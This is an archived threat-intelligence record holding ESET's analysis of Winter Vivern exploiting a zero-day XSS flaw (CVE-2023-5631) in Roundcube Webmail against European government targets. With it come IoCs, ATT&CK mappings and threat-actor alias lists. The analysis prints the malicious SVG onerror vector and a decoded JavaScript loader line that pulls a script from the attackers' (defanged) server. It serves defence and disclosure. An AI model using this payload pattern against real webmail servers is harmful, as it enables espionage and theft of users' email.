{
	"id": "86ff1bf6-7b57-476c-b4ef-61c8dcea0f07",
	"created_at": "2026-04-06T00:12:20.77362Z",
	"updated_at": "2026-04-10T03:37:50.101609Z",
	"deleted_at": null,
	"sha1_hash": "43285fb6c2df8046dbc4021ed2cf995f92b8e272",
	"title": "Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1129214,
	"plain_text": "Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 17:02:13 UTC\r\nESET Research\r\nESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible\r\n25 Oct 2023 • 5 min. read\r\nESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group began exploiting a zero-day XSS vulnerability in the Roundcube Webmail server on October 11th, 2023. This is a different vulnerability than CVE-2020-35730, which was also exploited by the group according to our research.\r\nAccording to ESET telemetry data, the campaign targeted Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe.\r\nVulnerability disclosure timeline:\r\n2023-10-12: ESET Research reported the vulnerability to the Roundcube team.\r\n2023-10-14: The Roundcube team responded and acknowledged the vulnerability.\r\n2023-10-14: The Roundcube team patched the vulnerability.\r\n2023-10-16: The Roundcube team released security updates to address the vulnerability (1.6.4, 1.5.5, and 1.4.15).\r\n2023-10-18: ESET CNA issued a CVE for the vulnerability (CVE-2023-5631).\r\n2023-10-25: ESET Research blogpost published.\r\nhttps://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/\r\nPage 1 of 7\r\nWe would like to thank the Roundcube developers for their quick reply and for patching the vulnerability in such a short time frame.\r\nWinter Vivern profile\r\nWinter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It is thought to have been active since at least 2020 and it targets governments in Europe and Central Asia. 
To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor (see the articles from the State Cyber Protection Centre of Ukraine and from SentinelLabs). We believe with low confidence that Winter Vivern is linked to MoustachedBouncer, a sophisticated Belarus-aligned group that we first published about in August 2023.\r\nWinter Vivern has been targeting Zimbra and Roundcube email servers belonging to governmental entities since at least 2022 – see this article from Proofpoint. In particular, we observed that the group exploited CVE-2020-35730, another XSS vulnerability in Roundcube, in August and September 2023. Note that Sednit (also known as APT28) is exploiting this old XSS vulnerability in Roundcube as well, sometimes against the same targets.\r\nTechnical details\r\nExploitation of the XSS vulnerability, assigned CVE-2023-5631, can be done remotely by sending a specially crafted email message. In this Winter Vivern campaign, the emails were sent from team.managment@outlook[.]com and had the subject Get started in your Outlook, as shown in Figure 1.\r\nFigure 1. Malicious email message\r\nAt first sight, the email doesn’t seem malicious – but if we examine the HTML source code, shown in Figure 2, we can see an SVG tag at the end, which contains a base64-encoded payload.\r\nFigure 2. Email message with a malicious SVG tag\r\nOnce we decode the base64-encoded value in the href attribute of the use tag, we have:\r\n<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\"> <image href=\"x\" onerror=\"eval(atob('&lt;base64-encoded payload&gt;'))\" />\r\n</svg>\r\nAs the x value argument of the href attribute is not a valid URL, this object’s onerror attribute will be activated. 
Decoding the payload in the onerror attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed in the browser of the victim in the context of their Roundcube session:\r\nvar fe=document.createElement('script');fe.src=\"https://recsecas[.]com/controlserver/checkupdate.js\";document.body.appendChild(fe);\r\nSurprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out that this was a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which doesn’t properly sanitize the malicious SVG document before it is added to the HTML page interpreted by a Roundcube user. We reported it to Roundcube and it was patched on October 14th, 2023 (see this commit). The vulnerability affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.\r\nIn summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is required.\r\nThe second stage is a simple JavaScript loader named checkupdate.js and is shown in Figure 3.\r\nFigure 3. JavaScript loader\r\nThe final JavaScript payload – shown in Figure 4 – is able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C\u0026C server by making HTTP requests to https://recsecas[.]com/controlserver/saveMessage.\r\nFigure 4. Final JavaScript payload exfiltrating email messages from the Roundcube account (part of the obfuscated script removed for clarity)\r\nConclusion\r\nWinter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. 
Previously, it was using known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online.\r\nDespite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 | Filename | Detection | Description\r\n97ED594EF2B5755F0549C6C5758377C0B87CFAE0 | checkupdate.js | JS/WinterVivern.B | JavaScript loader.\r\n8BF7FCC70F6CE032217D9210EF30314DDD6B8135 | N/A | JS/Kryptik.BIK | JavaScript payload exfiltrating emails in Roundcube.\r\nNetwork\r\nIP | Domain | Hosting provider | First seen | Details\r\n38.180.76[.]31 | recsecas[.]com | M247 Europe SRL | 2023-09-28 | Winter Vivern C\u0026C server\r\nEmail addresses\r\nteam.managment@outlook[.]com\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 13 of the MITRE ATT\u0026CK framework.\r\nTactic | ID | Name | Description\r\nResource Development | T1583.001 | Acquire Infrastructure: Domains | Winter Vivern operators bought a domain at Registrar.eu.\r\nResource Development | T1583.004 | Acquire Infrastructure: Server | Winter Vivern operators rented a server at M247.\r\nResource Development | T1587.004 | Develop Capabilities: Exploits | Winter Vivern operators probably developed an exploit for Roundcube.\r\nInitial Access | T1190 | Exploit Public-Facing Application | Winter Vivern sent an email exploiting CVE-2023-5631 in Roundcube.\r\nInitial Access | T1566 | Phishing | The vulnerability is triggered via a phishing email, which should be opened in the Roundcube webmail by the victim.\r\nExecution | T1203 | Exploitation for Client Execution | The JavaScript payload is executed by an XSS vulnerability in Roundcube.\r\nDiscovery | T1087.003 | Account Discovery: Email Account | The JavaScript payload can list folders in the email account.\r\nCollection | T1114.002 | Email Collection: Remote Email Collection | The JavaScript payload can exfiltrate emails from the Roundcube account.\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | C\u0026C communications use HTTPS.\r\nExfiltration | T1041 | Exfiltration Over C2 Channel | Exfiltration is done via HTTPS and to the same C\u0026C server.\r\nSource: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/"
	],
	"report_names": [
		"winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "821cb2ce-472c-438f-943d-19cf23204d9a",
			"created_at": "2023-11-01T02:01:06.683709Z",
			"updated_at": "2026-04-10T02:00:05.39433Z",
			"deleted_at": null,
			"main_name": "MoustachedBouncer",
			"aliases": [
				"MoustachedBouncer"
			],
			"source_name": "MITRE:MoustachedBouncer",
			"tools": [
				"SharpDisco"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7d9d90f3-001e-4adc-8a77-8f93b5d02b01",
			"created_at": "2023-09-07T02:02:47.575324Z",
			"updated_at": "2026-04-10T02:00:04.770856Z",
			"deleted_at": null,
			"main_name": "MoustachedBouncer",
			"aliases": [],
			"source_name": "ETDA:MoustachedBouncer",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0e74afe0-92c3-4fca-93a4-d8e51180e105",
			"created_at": "2023-08-11T02:00:11.229735Z",
			"updated_at": "2026-04-10T02:00:03.37095Z",
			"deleted_at": null,
			"main_name": "MoustachedBouncer",
			"aliases": [],
			"source_name": "MISPGALAXY:MoustachedBouncer",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43285fb6c2df8046dbc4021ed2cf995f92b8e272.pdf",
		"text": "https://archive.orkl.eu/43285fb6c2df8046dbc4021ed2cf995f92b8e272.txt",
		"img": "https://archive.orkl.eu/43285fb6c2df8046dbc4021ed2cf995f92b8e272.jpg"
	}
}